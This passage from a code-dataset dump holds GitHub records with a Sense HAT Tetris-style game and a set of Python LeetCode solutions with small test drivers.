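assert p.max_prod([-5, -4, -3, -2, -1]) == -6         # (-3) * (-2) * (-1)
print('max_prod spot checks passed')
```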
Ruben9922/sh-tetrominoes-game | https://github.com/Ruben9922/sh-tetrominoes-game | 0d48f8d3a5e7c26f787011a0662fca92d46bad5c | c0c77021543fb695c926e7c363128ba981bc1b9e | 008d334aca023f5207dca89356cdb410e4d6add7 | refs/heads/master | 2021-01-13T14:58:56.629694 | 2018-06-21T15:09:30 | 2018-06-21T15:09:30 | 76,651,779 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.49685534834861755,
"alphanum_fraction": 0.5263960361480713,
"avg_line_length": 28.312849044799805,
"blob_id": "9c02b0f3a49257232a3d9ce3ab5e31b4b20f7249",
"content_id": "6fbcee2298718d2a92877e6c6a7e6cd667742b5d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5247,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 179,
"path": "/tetrominoes-game.py",
"repo_name": "Ruben9922/sh-tetrominoes-game",
"src_encoding": "UTF-8",
"text": "import math\nfrom random import randrange\nfrom time import sleep\n\nfrom euclid import Point2, Vector2\nfrom sense_emu import SenseHat\n\n\nclass Shape:\n shape_colour = [255, 153, 51]\n\n def __init__(self, shape_type, pos, vel):\n self.shape_type = shape_type\n self.pos = pos\n self.vel = vel\n\n def display(self):\n for point in self.shape_type.points:\n actual_pos = self.pos + point\n if 0 <= actual_pos.x <= 7 and 0 <= actual_pos.y <= 7:\n sense.set_pixel(actual_pos.x, actual_pos.y, self.shape_colour)\n\n def collides(self, shapes, offset):\n for point1 in self.shape_type.points:\n point1_wc = point1 + self.pos\n for shape in shapes:\n if shape != self: # Don't compare this shape to itself\n for point2 in shape.shape_type.points:\n point2_wc = point2 + shape.pos\n if point2_wc - point1_wc == offset:\n return True\n return False\n\n def rotate(self):\n width = self.shape_type.compute_width()\n height = self.shape_type.compute_height()\n points = self.shape_type.points\n\n centre = Point2((width - 1) / 2, (height - 1) / 2)\n for i, point in enumerate(points):\n diff = point - centre # Effectively translate so centre is at origin\n diff[:] = (diff.y, -diff.x) # Effectively rotate around origin\n point = centre + diff # Effectively translate back\n point[:] = map(math.floor, point[:])\n points[i] = point\n\n\nclass ShapeType:\n def __init__(self, points):\n self.points = points\n\n def compute_width(self):\n max_x = max(point.x for point in self.points)\n min_x = min(point.x for point in self.points)\n return abs(max_x - min_x) + 1\n\n def compute_height(self):\n max_y = max(point.y for point in self.points)\n min_y = min(point.y for point in self.points)\n return abs(max_y - min_y) + 1\n\n\ndef move_left(event, shapes):\n if event.action == \"pressed\":\n last_shape = shapes[-1]\n if last_shape.pos.x > 0 and not last_shape.collides(shapes, Vector2(-1, 0)):\n last_shape.pos += Vector2(-1, 0)\n\n\ndef move_right(event, shapes):\n if event.action == \"pressed\":\n last_shape = shapes[-1]\n if (last_shape.pos.x < 8 - last_shape.shape_type.compute_width()\n and not last_shape.collides(shapes, Vector2(1, 0))):\n last_shape.pos += Vector2(1, 0)\n\n\ndef rotate_shape(event, shapes):\n if event.action == \"pressed\":\n last_shape = shapes[-1]\n last_shape.rotate()\n\n\ndef main():\n global sense\n\n # Initial setup\n sense = SenseHat()\n # sense.set_rotation(180)\n # sense.low_light = True\n\n update_interval = 7\n background_colour = [0, 0, 0]\n shape_types = [\n ShapeType([\n Point2(0, 0),\n Point2(0, 1),\n Point2(0, 2),\n Point2(0, 3),\n ]),\n ShapeType([\n Point2(0, 0),\n Point2(0, 1),\n Point2(1, 0),\n Point2(1, 1),\n ]),\n ShapeType([\n Point2(0, 0),\n Point2(0, 1),\n Point2(0, 2),\n Point2(1, 1),\n ]),\n ShapeType([\n Point2(0, 0),\n Point2(0, 1),\n Point2(0, 2),\n Point2(1, 0),\n ]),\n ShapeType([\n Point2(0, 0),\n Point2(0, 1),\n Point2(0, 2),\n Point2(1, 2),\n ]),\n ShapeType([\n Point2(0, 1),\n Point2(0, 2),\n Point2(1, 0),\n Point2(1, 1),\n ]),\n ShapeType([\n Point2(0, 0),\n Point2(0, 1),\n Point2(1, 1),\n Point2(1, 2),\n ]),\n ]\n shapes = []\n count = 0\n\n sense.stick.direction_left = lambda event: move_left(event, shapes)\n sense.stick.direction_right = lambda event: move_right(event, shapes)\n sense.stick.direction_up = lambda event: rotate_shape(event, shapes)\n\n while True:\n sense.clear(background_colour)\n # Update shape velocities\n for shape in shapes:\n if shape.pos.y >= 8 - shape.shape_type.compute_height() or shape.collides(shapes, Vector2(0, 1)):\n shape.vel 
= Vector2(0, 0)\n\n # Update shape positions based on their updated velocities\n for shape in shapes:\n shape.pos += shape.vel\n\n # Set count to zero if update interval exceed\n if count >= update_interval:\n count = 0\n\n # If interval reached, choose random shape type then add to `moving_shapes` list\n if count == 0:\n shape_type = shape_types[randrange(len(shape_types))]\n pos = Point2(randrange(9 - shape_type.compute_width()), 1 - shape_type.compute_height())\n initial_vel = Vector2(0, 1)\n shape = Shape(shape_type, pos, initial_vel)\n shapes.append(shape)\n\n # Display shapes\n for shape in shapes:\n shape.display()\n\n # Increment count and wait\n count += 1\n sleep(1)\n # sense.low_light = False\n\n\nif __name__ == \"__main__\":\n main()\n"
}
] | 1 |
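The trickiest arithmetic in the game above is `Shape.rotate`: translate each block so the piece's centre sits at the origin, apply the 90-degree map (x, y) -> (y, -x), translate back, and floor. The same math with plain tuples instead of euclid points, rotating a J-piece (coordinates may go negative, exactly as in the game):

```python
import math

def rotate_points(points):
    # Centre of the piece's bounding box.
    xs = [p[0] for p in points]
    ys = [p[1] for p in points]
    cx, cy = (max(xs) + min(xs)) / 2.0, (max(ys) + min(ys)) / 2.0
    # Rotate each offset by 90 degrees about the centre, then floor.
    return [(math.floor(cx + (y - cy)), math.floor(cy - (x - cx)))
            for x, y in points]

print(rotate_points([(0, 0), (0, 1), (0, 2), (1, 0)]))
# [(-1, 1), (0, 1), (1, 1), (-1, 0)]
```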
KnightChan/LeetCode-Python | https://github.com/KnightChan/LeetCode-Python | 41db7948dc2d02c7f58b6e574397ff5d59ecbfdc | d16e4724ee34a0046cb2a8b0b13139b43d284e83 | f4021be29a7fd8a55a9f93a910aba1d6d62cd5ca | refs/heads/master | 2020-04-15T08:44:38.585819 | 2015-03-08T06:21:41 | 2015-03-08T06:21:41 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5859649181365967,
"alphanum_fraction": 0.6140350699424744,
"avg_line_length": 41.75,
"blob_id": "f6b3be007de871971ff95b78e31c6234adc11abc",
"content_id": "8798feeebcf02c7c24499450013fbe6234eee6cb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 855,
"license_type": "no_license",
"max_line_length": 220,
"num_lines": 20,
"path": "/Two Sum.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @return a tuple, (index1, index2)\n def twoSum(self, num, target):\n '''Given an array of integers, find two numbers such that they add up to a specific target number.\n\nThe function twoSum should return indices of the two numbers such that they add up to the target, where index1 must be less than index2. Please note that your returned answers (both index1 and index2) are not zero-based.\n\nYou may assume that each input would have exactly one solution.\n\nInput: numbers={2, 7, 11, 15}, target=9\nOutput: index1=1, index2=2 '''\n if len(num) < 2:\n return (0, 0)\n dic = {}\n for i in range(0, len(num)):\n dic[num[i]] = i\n for i in range(0, len(num)):\n need = target - num[i]\n if need in dic and dic[need] != i:\n return (i + 1, dic[need] + 1)\n"
},
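Quick checks appended after the class, covering the stated example and the duplicate-value case that the `dic[need] != i` guard handles:

```python
print(Solution().twoSum([2, 7, 11, 15], 9))  # (1, 2)
print(Solution().twoSum([3, 3], 6))          # (1, 2)
```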
{
"alpha_fraction": 0.41897082328796387,
"alphanum_fraction": 0.44508448243141174,
"avg_line_length": 30.768293380737305,
"blob_id": "3e3ecd5339ce3e3cc9d3d282129d02238c83a655",
"content_id": "f541692272bbaa85a75285edfe0c1fe92a240216",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2612,
"license_type": "no_license",
"max_line_length": 163,
"num_lines": 82,
"path": "/3Sum.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "#coding=utf-8\nclass Solution:\n # @return a list of lists of length 3, [[val1,val2,val3]]\n def threeSum(self, num):\n '''\n Given an array S of n integers, are there elements a, b, c in S such that a + b + c = 0? Find all unique triplets in the array which gives the sum of zero.\n\nNote:\n\n Elements in a triplet (a,b,c) must be in non-descending order. (ie, a ≤ b ≤ c)\n The solution set must not contain duplicate triplets.\n\n For example, given array S = {-1 0 1 2 -1 -4},\n\n A solution set is:\n (-1, 0, 1)\n (-1, -1, 2)\n '''\n num.sort()\n resset = set()\n for i in range(len(num) - 2):\n if i > 0 and num[i] == num[i - 1]:\n continue\n j = i + 1\n k = len(num) - 1\n while j < k:\n x = num[i] + num[j] + num[k]\n if x == 0:\n resset.add((num[i], num[j], num[k]))\n j += 1\n k -= 1\n elif x < 0:\n j += 1\n else:\n k -= 1\n res = []\n for item in resset:\n res.append([item[0], item[1], item[2]])\n return res\n\n # @return a list of lists of length 3, [[val1,val2,val3]]\n def threeSum_withDic(self, num):\n '''\n Given an array S of n integers, are there elements a, b, c in S such that a + b + c = 0? Find all unique triplets in the array which gives the sum of zero.\n\nNote:\n\n Elements in a triplet (a,b,c) must be in non-descending order. (ie, a ≤ b ≤ c)\n The solution set must not contain duplicate triplets.\n\n For example, given array S = {-1 0 1 2 -1 -4},\n\n A solution set is:\n (-1, 0, 1)\n (-1, -1, 2)\n '''\n num.sort()\n dic = {}\n res = []\n for i in range(len(num)):\n dic[num[i]] = i\n for i in range(len(num) - 2):\n if i > 0 and num[i] == num[i - 1]:\n continue\n for j in range(i + 1, len(num) - 1):\n if j > i + 1 and num[j] == num[j - 1]:\n continue\n kv = -num[i] - num[j]\n if kv in dic and dic[kv] > j:\n if len(res) > 0:\n x = res.pop()\n res.append(x)\n if x[0] == num[i] and x[1] == num[j] and x[2] == kv:\n continue\n res.append([num[i], num[j], kv])\n return res\n\nnum1 = [-1, 0, 1, 2, -1, -4]\nnum = num1\nprint(len(num), num)\nres = Solution.threeSum(Solution(), num)\nprint(len(res), res)"
},
{
"alpha_fraction": 0.4985741376876831,
"alphanum_fraction": 0.5038022994995117,
"avg_line_length": 25.987178802490234,
"blob_id": "b0a06a4e48a89070c92294eaaef2da5924d77869",
"content_id": "e9865e7bbd3c6fae6fd49c7fc2c248e9366fa9ea",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2104,
"license_type": "no_license",
"max_line_length": 143,
"num_lines": 78,
"path": "/Copy List with Random Pointer.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "# Definition for singly-linked list with a random pointer.\n# class RandomListNode:\n# def __init__(self, x):\n# self.label = x\n# self.next = None\n# self.random = None\n\nclass Solution:\n # @param head, a RandomListNode\n # @return a RandomListNode\n def copyRandomList(self, head):\n ''' A linked list is given such that each node contains an additional random pointer which could point to any node in the list or null.\n\nReturn a deep copy of the list. '''\n if head is None:\n return None\n tp = head\n while tp is not None:\n tpc = RandomListNode(tp.label)\n tpc.next = tp.next\n tp.next = tpc\n tp = tpc.next\n tp = head\n while tp is not None:\n if tp.random is not None:\n tp.next.random = tp.random.next\n tp = tp.next.next\n h1 = head\n h2 = head.next\n tp = head\n while tp.next is not None:\n t = tp.next\n tp.next = tp.next.next\n tp = t\n head = h1\n return h2\n\nclass RandomListNode:\n def __init__(self, x):\n self.label = x\n self.next = None\n self.random = None\n\n def __str__(self):\n #print(\"in str\")\n tmp = self\n if tmp is None:\n return \"None!\"\n strs = []\n while tmp.next is not None:\n x = \"N\"\n if tmp.random is not None:\n x = str(tmp.random.label)\n strs.append(\"(\" + str(tmp.label) + \",\" + x + \")->\")\n tmp = tmp.next\n else:\n x = \"N\"\n if tmp.random is not None:\n x = str(tmp.random.label)\n strs.append(\"(\" + str(tmp.label) + \",\" + x + \");\")\n return \"\".join(strs)\n\nin0 = [1, 2, 2, 2]\n\nins = [in0]\n\nfor tin in ins:\n head = RandomListNode(0)\n tail = head\n for val in tin:\n tail.next = RandomListNode(val)\n tail = tail.next\n ss = Solution()\n print(len(tin), tin)\n print(head.next)\n print(ss.copyRandomList(head.next))\n print(head.next)\n print()"
},
{
"alpha_fraction": 0.4268476665019989,
"alphanum_fraction": 0.47586727142333984,
"avg_line_length": 29.86046600341797,
"blob_id": "66c0dd193fff3295331078315f51296e7d67e7d1",
"content_id": "176f9bd3bcde9cf075461cdde07a5366efe82081",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1326,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 43,
"path": "/Single Number II.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param A, a list of integer\n # @return an integer\n def singleNumber(self, A):\n ''' Given an array of integers, every element appears three times except for one. Find that single one.\n\nNote:\nYour algorithm should have a linear runtime complexity. Could you implement it without using extra memory? '''\n ones = 0\n twos = 0\n for a in A:\n threes = twos & a\n twos = (twos | (ones & a)) & ~threes\n ones = (ones | a) & ~threes & ~twos\n return ones\n\n def singleNumber1(self, A):\n xbits = [1]\n bcounts = [0]\n l = 0\n for i in range(1, 32):\n xbits.append(xbits[l] << 1)\n bcounts.append(0)\n l += 1\n for a in A:\n while a > xbits[l]:\n xbits.append(xbits[l] << 1)\n bcounts.append(0)\n l += 1\n for a in A:\n for i in range(0, l + 1):\n bcounts[i] += (a & xbits[i]) >> i\n res = 0\n for i in range(0, 31):\n res += bcounts[i] % 3 * xbits[i]\n return res - bcounts[31] % 3 * xbits[31]\n\nA = [1, 2, 3, 3, 2, 1, 4, 5, 4, 1, 2, 3, 4, 6, 5, 5]\nA1 = [1, 1, 2, 1, 2, 2, 99]\nA2 = [-2, -2, 1, 1, -3, 1, -3, -3, -4, -2]\nso = Solution()\nres = so.singleNumber1(A2)\nprint(res)"
},
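The `ones`/`twos` registers in the first solution track, per bit, how many times that bit has appeared modulo 3; any bit that reaches three is cleared via `threes`. A hand-traceable run on the stream 5, 5, 5, 7, where the three 5s cancel and only 7 survives:

```python
ones = twos = 0
for a in [5, 5, 5, 7]:
    threes = twos & a                      # bits hitting their third occurrence
    twos = (twos | (ones & a)) & ~threes   # bits seen exactly twice (mod 3)
    ones = (ones | a) & ~threes & ~twos    # bits seen exactly once (mod 3)
print(ones)  # 7
```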
{
"alpha_fraction": 0.5280268788337708,
"alphanum_fraction": 0.5515695214271545,
"avg_line_length": 33.32692337036133,
"blob_id": "ef5750be8dc9bd77aea860d8a013d7c85bde7590",
"content_id": "fe001eecd27fdc1530d6700218eb358aeb58ba1e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1794,
"license_type": "no_license",
"max_line_length": 143,
"num_lines": 52,
"path": "/Combination Sum.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param candidates, a list of integers\n # @param target, integer\n # @return a list of lists of integers\n def combinationSum(self, candidates, target):\n '''\n Given a set of candidate numbers (C) and a target number (T), find all unique combinations in C where the candidate numbers sums to T.\n\nThe same repeated number may be chosen from C unlimited number of times.\n\nNote:\n\n All numbers (including target) will be positive integers.\n Elements in a combination (a1, a2, … , ak) must be in non-descending order. (ie, a1 ≤ a2 ≤ … ≤ ak).\n The solution set must not contain duplicate combinations.\n\nFor example, given candidate set 2,3,6,7 and target 7,\nA solution set is:\n[7]\n[2, 2, 3] \n '''\n p = [set() for i in range(target + 1)]\n f = [False] * (target + 1)\n last_no = [-1] * (target + 1)\n f[0] = True\n candidates.sort(reverse=True)\n for i in range(len(candidates)):\n for j in range(candidates[i], target + 1):\n if f[j - candidates[i]] and i >= last_no[j - candidates[i]]:\n f[j] = True\n p[j].add(j - candidates[i])\n last_no[j] = i\n res = []\n self.path_dfs(p, target, [], res)\n return res\n\n def path_dfs(self, path, v, nowlist, res):\n if v == 0:\n res.append(list(nowlist))\n return\n for par in path[v]:\n if len(nowlist) > 0 and v - par < nowlist[len(nowlist) - 1]:\n continue\n nowlist.append(v - par)\n self.path_dfs(path, par, nowlist, res)\n nowlist.pop()\n\na0 = [10, [2, 3, 6, 7]]\na1 = [8, [10, 1, 2, 7, 6, 1, 5]]\na = a1\nprint(a)\nprint(Solution.combinationSum(Solution(), a[1], a[0]))"
},
{
"alpha_fraction": 0.5230202674865723,
"alphanum_fraction": 0.559852659702301,
"avg_line_length": 27.605262756347656,
"blob_id": "91ab6b57976d46f9595a7a3b04be8a619e2db505",
"content_id": "fb8d27a92cc929ba0ae4812bdbd9dd6830467954",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1086,
"license_type": "no_license",
"max_line_length": 165,
"num_lines": 38,
"path": "/Largest Rectangle in Histogram.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param height, a list of integer\n # @return an integer\n def largestRectangleArea(self, height):\n '''\n Given n non-negative integers representing the histogram's bar height where the width of each bar is 1, find the area of largest rectangle in the histogram.\n\n\nAbove is a histogram where width of each bar is 1, given height = [2,1,5,6,2,3].\n\n\nThe largest rectangle is shown in the shaded area, which has area = 10 unit.\n\nFor example,\nGiven height = [2,1,5,6,2,3],\nreturn 10. \n '''\n n = len(height) + 1\n height.append(-1)\n stack = [[-1, -1]]\n maximum = 0\n for i in range(n):\n last = stack.pop()\n k = i\n while height[i] < last[0]:\n maximum = max(maximum, (i - last[1]) * last[0])\n k = last[1]\n last = stack.pop()\n stack.append(last)\n stack.append([height[i], k])\n return maximum\n\na1 = []\na2 = [2,1,5,6,2,3]\na3 = [2,1,2]\na = a3\nprint(len(a), a)\nprint(Solution.largestRectangleArea(Solution(), a))"
},
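The stack holds bars of non-decreasing height; when a lower bar arrives, each popped bar becomes the height of a candidate rectangle whose width runs from the popped bar's stored start index to the current position. On `[2,1,5,6,2,3]` the trailing 2 pops the 6 (area 6) and then the 5 (area 5 x 2 = 10), which is the answer. A small extra check, appended after the class:

```python
print(Solution().largestRectangleArea([2, 1, 2]))  # 3: full width at height 1
```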
{
"alpha_fraction": 0.4316290020942688,
"alphanum_fraction": 0.48632580041885376,
"avg_line_length": 25.3125,
"blob_id": "0a3f9635c2a82c509a9b226cf19abb679ba42255",
"content_id": "5db01a655a0af79b0cfbb8322a0e4c3547d77caf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 841,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 32,
"path": "/First Missing Positive.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param A, a list of integers\n # @return an integer\n def firstMissingPositive(self, A):\n '''\n Given an unsorted integer array, find the first missing positive integer.\n\nFor example,\nGiven [1,2,0] return 3,\nand [3,4,-1,1] return 2.\n\nYour algorithm should run in O(n) time and uses constant space. \n '''\n if len(A) == 0:\n return 1\n for i in range(len(A)):\n while 0 < A[i] < len(A) and A[i] != i + 1 and A[A[i] - 1] != A[i]:\n j = A[i] - 1\n A[i], A[j] = A[j], A[i]\n i = 0\n while i < len(A):\n if A[i] != i + 1:\n break\n i += 1\n return i + 1\n\na0 = [-10,-3,-100,-1000,-239,1]\na1 = [-1,4,2,1,9,10]\na2 = [1, 1]\na = a2\nprint(a)\nprint(Solution.firstMissingPositive(Solution(), a))"
},
{
"alpha_fraction": 0.46603477001190186,
"alphanum_fraction": 0.4857819974422455,
"avg_line_length": 34.19444274902344,
"blob_id": "c67345d2509b9e966e5ed8108c4b59f77b084744",
"content_id": "5029931da9d0bb1720cf1cba238823f5ab8ac30a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1266,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 36,
"path": "/Palindrome Partitioning II.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param s, a string\n # @return an integer\n def minCut(self, s):\n ''' Given a string s, partition s such that every substring of the partition is a palindrome.\n\nReturn the minimum cuts needed for a palindrome partitioning of s.\n\nFor example, given s = \"aab\",\nReturn 1 since the palindrome partitioning [\"aa\",\"b\"] could be produced using 1 cut. '''\n n = len(s)\n if n <= 1:\n return 0\n is_palindrome = [[False] * n for row in range(n)]\n for pos in range(0, n):\n l = 0\n while pos - l >= 0 and pos + l <= n - 1 and s[pos - l] == s[pos + l]:\n is_palindrome[pos - l][pos + l] = True\n l += 1\n l = 0\n while pos - l - 1 >= 0 and pos + l <= n - 1 and s[pos - l - 1] == s[pos + l]:\n is_palindrome[pos - l - 1][pos + l] = True\n l += 1\n min_cut = list(range(n + 1))\n min_cut[n] = 0\n for i in range(n - 1, -1, -1):\n min_cut[i] = n\n for j in range(i, n):\n if is_palindrome[i][j]:\n min_cut[i] = min(min_cut[i], min_cut[j + 1] + 1)\n return min_cut[0] - 1\n\ns='aab'\nprint(len(s))\nprint(s)\nprint(Solution.minCut(Solution(), s))"
},
{
"alpha_fraction": 0.437313437461853,
"alphanum_fraction": 0.46716418862342834,
"avg_line_length": 20.612903594970703,
"blob_id": "be066a433f456d0da594780c67064fe197650dc8",
"content_id": "9a797aca61863b6963e73ad1d9a3643ae9186c3e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 670,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 31,
"path": "/Combinations.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @return a list of lists of integers\n def combine(self, n, k):\n '''\n Given two integers n and k, return all possible combinations of k numbers out of 1 ... n.\n\nFor example,\nIf n = 4 and k = 2, a solution is:\n\n[\n [2,4],\n [3,4],\n [2,3],\n [1,2],\n [1,3],\n [1,4],\n]\n\n '''\n res = []\n self.dfs(n, k, 0, 0, [], res)\n return res\n \n def dfs(self, n, k, ith, x, nowlist, res):\n if ith == k:\n res.append(list(nowlist))\n return\n for v in range(x + 1, n + 1):\n nowlist.append(v)\n self.dfs(n, k, ith + 1, v, nowlist, res)\n nowlist.pop()\n"
},
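A hypothetical local driver for the Combinations record above (not part of the archived file), assuming its Solution class is in scope; the DFS emits combinations in ascending order:

    s = Solution()
    # all 2-element combinations drawn from 1..4
    print(s.combine(4, 2))  # [[1, 2], [1, 3], [1, 4], [2, 3], [2, 4], [3, 4]]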
{
"alpha_fraction": 0.40502792596817017,
"alphanum_fraction": 0.42085662484169006,
"avg_line_length": 26.564102172851562,
"blob_id": "3011a2537e6bae9563e84750eb551feba253e5e3",
"content_id": "349637e3c122c9f695c113f3eab06f347d160826",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1074,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 39,
"path": "/Search in Rotated Sorted Array II.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param A a list of integers\n # @param target an integer\n # @return a boolean\n def search(self, A, target):\n '''\n Follow up for \"Search in Rotated Sorted Array\":\nWhat if duplicates are allowed?\n\nWould this affect the run-time complexity? How and why?\n\nWrite a function to determine if a given target is in the array.\n '''\n l, r = 0, len(A) - 1\n while l <= r:\n if l == r:\n return target == A[l]\n mid = (l + r) // 2\n if A[mid] == target:\n return True\n if A[mid] == A[r]:\n r -= 1\n continue\n if A[mid] > A[r]:\n if A[l] <= target < A[mid]:\n r = mid - 1\n else:\n l = mid + 1\n else:\n if A[mid] < target <= A[r]:\n l = mid + 1\n else:\n r = mid - 1\n return False\n\na1 = [0, [1, 3]]\na = a1\nprint(a[0], a[1])\nprint(Solution.search(Solution(), a[1], a[0]))"
},
{
"alpha_fraction": 0.47543221712112427,
"alphanum_fraction": 0.4890809953212738,
"avg_line_length": 22.147367477416992,
"blob_id": "1f175aa07d79961dc2b76a632de03644f8c9f4ff",
"content_id": "41e172168a61a8051a37599c2ebaadf4de299d94",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2222,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 95,
"path": "/Reorder List.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n # @param head, a ListNode\n # @return nothing\n def reorderList(self, head):\n \"\"\" Given a singly linked list L: L0→L1→…→Ln-1→Ln,\nreorder it to: L0→Ln→L1→Ln-1→L2→Ln-2→…\n\nYou must do this in-place without altering the nodes' values.\n\nFor example,\nGiven {1,2,3,4}, reorder it to {1,4,2,3}. \"\"\"\n size = 0\n lhead = head\n rhead = head\n while rhead:\n size += 1\n rhead = rhead.next\n if size <= 1:\n return head\n halfsize = size - size // 2\n rhead = head\n tmp = None\n while halfsize > 0:\n if halfsize == 1:\n tmp = rhead\n rhead = rhead.next\n halfsize -= 1\n tmp.next = None\n #print('rhead : ', rhead)\n\n rhead = self.reverseList(rhead)\n\n #print('lhead : ', lhead)\n #print('rhead : ', rhead)\n\n head = lhead\n while rhead:\n lnext = lhead.next\n tmp = rhead\n rhead = rhead.next\n lhead.next = tmp\n tmp.next = lnext\n lhead = lnext\n\n def reverseList(self, head):\n if head is None or head.next is None:\n return head\n pnext = head.next\n head.next = None\n while pnext:\n tmp = pnext\n pnext = pnext.next\n tmp.next = head\n head = tmp\n return head\n\n\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\n def __str__(self):\n # print(\"in str\")\n tmp = self\n strs = []\n while tmp.next is not None:\n strs.append(str(tmp.val) + \"->\")\n tmp = tmp.next\n else:\n strs.append(str(tmp.val) + \";\")\n return \"\".join(strs)\n\nin0 = [1, 2, 3, 4]\n\nins = [in0]\n\nfor tin in ins:\n head = ListNode(0)\n tail = head\n for val in tin:\n tail.next = ListNode(val)\n tail = tail.next\n ss = Solution()\n print(len(tin), tin)\n print(head)\n ss.reorderList(head.next)\n print(head.next)\n print()"
},
{
"alpha_fraction": 0.4396946430206299,
"alphanum_fraction": 0.4519084095954895,
"avg_line_length": 27.478260040283203,
"blob_id": "0733b22bbfe8b929cfaed315ff8c77e5d654343d",
"content_id": "a2aa6c8e9434bd609cff50649b837ad54099d7b3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 655,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 23,
"path": "/Generate Parentheses.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param an integer\n # @return a list of string\n def generateParenthesis(self, n):\n '''\n Given n pairs of parentheses, write a function to generate all combinations of well-formed parentheses.\n\nFor example, given n = 3, a solution set is:\n\n\"((()))\", \"(()())\", \"(())()\", \"()(())\", \"()()()\" \n '''\n res = []\n self.dfs(n, 0, '', res)\n return res\n \n def dfs(self, x, y, now, res):\n if x + y == 0:\n res.append(now)\n return\n if x > 0:\n self.dfs(x - 1, y + 1, now + '(', res)\n if y > 0:\n self.dfs(x, y - 1, now + ')', res)\n"
},
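A minimal usage sketch for the Generate Parentheses record above (assuming its Solution class is importable as written); in the DFS, x counts unplaced '(' and y counts unmatched '(':

    s = Solution()
    print(s.generateParenthesis(3))
    # ['((()))', '(()())', '(())()', '()(())', '()()()']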
{
"alpha_fraction": 0.5367761850357056,
"alphanum_fraction": 0.5586854219436646,
"avg_line_length": 33.56756591796875,
"blob_id": "77cac29a2de03ac163383086bc9c97e00edaac5c",
"content_id": "1c5f35b00f878676f095ae11a709469b262dc0a9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1278,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 37,
"path": "/Best Time to Buy and Sell Stock III.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param prices, a list of integer\n # @return an integer\n def maxProfit(self, prices):\n '''Say you have an array for which the ith element is the price of a given stock on day i.\n\nDesign an algorithm to find the maximum profit. You may complete at most two transactions.\n\nNote:\nYou may not engage in multiple transactions at the same time (ie, you must sell the stock before you buy again).'''\n n = len(prices)\n if n <= 1:\n return 0\n min_price = prices[0]\n ltor_profits = [0] * n\n for i in range(1, n):\n if prices[i] < min_price:\n min_price = prices[i]\n ltor_profits[i] = max(ltor_profits[i - 1], prices[i] - min_price)\n\n rtol_profits = [0] * (n + 1)\n rtol_profits[n] = 0\n max_price = prices[n - 1]\n for i in range(n - 2, -1, -1):\n if prices[i] > max_price:\n max_price = prices[i]\n rtol_profits[i] = max(rtol_profits[i + 1], max_price - prices[i])\n max_profit = 0\n for i in range(0, n):\n max_profit = max(max_profit, ltor_profits[i] + rtol_profits[i + 1])\n return max_profit\n\na1 = [2, 1]\na2 = \t[3,2,6,5,0,3]\na = a2\nprint(a)\nprint(Solution.maxProfit(Solution(), a))"
},
{
"alpha_fraction": 0.5335720777511597,
"alphanum_fraction": 0.5389435887336731,
"avg_line_length": 25.595237731933594,
"blob_id": "7c5a8f89d88a563b0a6d500723ead749de5217af",
"content_id": "3f4495c84cf5dcb5c8518b9a784bdbe368c6752d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1117,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 42,
"path": "/Binary Tree Maximum Path Sum.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
